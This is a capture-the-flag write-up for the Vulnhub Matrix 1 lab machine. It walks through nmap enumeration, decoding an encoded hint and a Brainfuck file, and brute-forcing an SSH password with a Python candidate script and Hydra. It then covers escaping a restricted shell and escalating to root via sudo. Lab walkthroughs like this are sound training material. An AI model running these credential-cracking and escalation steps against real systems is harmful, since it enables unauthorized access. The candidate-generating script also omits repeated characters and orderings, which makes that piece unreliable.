Vulnhub Matrix 1 Writeup

Vulnhub Matrix 1 Writeup

This is the first of three Matrix-themed CTFs on vulnhub.com. The Description says it is an intermediate CTF, the goal is to get root and read /root/flag.txt. The hint tells us "Follow your intuitions ... and enumerate!".

Enumeration

Like always

nmap -sP 10.38.1.0/24

is showing us the devices in the target network. So the target machine IP is revealed as 10.38.1.112.

Let's enumerate a bit further and see what's running on the machine.

namp -sC -sV 10.38.1.112

is showing that we have an open SSH port on port 22, a simple Python HTTP server on port 80 and a simple Python http server on port 31337.

Initial Access

I decided to investigate the simple Python server on port 80 first.

There`s a website running telling me to follow the rabbit. It gave me a little flashback from the Wonderland machine on TryHackMe. The clock thing seems to not working. However, I found a small white rabbit icon at the bottom of the site. Clicking it gave me a picture of a white rabbit named "p0rt_31337"

I checked the source of the page but there was nothing more to find. Since there is nothing more I could find on that webpage I switched over to the website on port 31337.

It's the same page as the one on port 80 the clock seems not to work either. I checked the source of the page. And found an encoded line of text.

I copied it and put it on CyberChef. Cyberchef is pretty good with "guessing" what encoding is used in smaller lines of text. So I didn't even bother to think about what encoding might be used. And let the CyberChef do its magic and decide the right recipe.

It is another quote from the Matrix movie plus " > Cypher.matrix". I interpreted ">" to look at Cypher.matrix. Visiting 10.38.1.112:31337/Cypher.matrix downloads a .txt file with some very weird code.


+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

I searched online for hints on what this could be. Quickly I found that this is a language called BrainFuck. With an online Brainfuck decoder I was able to translate the file. It said, "You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password". These are clear instructions to log in via SSH. I wrote a short Python script to run through all combinations of letters and numbers.

import itertools

password_incomplete = "k1ll0r"
characters = ["a", "b", "c", "d", 
              "e", "f", "g", "h", 
              "i", "j", "k", "l", 
              "m", "n", "o", "p", 
              "q", "r", "s", "t", 
              "u", "v", "w", "x", 
              "y", "z", "1", "2", 
              "3", "4", "5", "6", 
              "7", "8", "9", "0"]

for i in range(len(characters)+1):
    for j in itertools.combinations(characters, i):
        password = "".join(j)
        if len(password) <= 2:
            print(password_incomplete + password)

I piped the output of the script to passwords.txt

python ./passwords.py > passwords.txt

And used the created passwords.txt as a list to crack the password for the guest user with Hydra.

hydra -l guest -P passwords.txt 10.38.1.112 ssh

The correct password was quickly cracked and I could log in as the guest user. Unfortunately, it's only a restricted shell.

There are a lot of possibilities to bypass the restriction and I tried a lot of them. Finally

sudo ssh guest@10.38.1.112 -t bash

gave me access to an unrestricted shell.

Root Access

I used SCP and the Python simple HTTP server to download linpeas on the target machine. After it finished I scrolled through linpeas' output.

I gave myself a facepalm because I could've found that out by simply typing

sudo -l

in my shell. But here we are... The guest user is in the ALL group. This means with a simple

sudo su

I'm granted root access, hence I was able to get the root flag and complete the machine.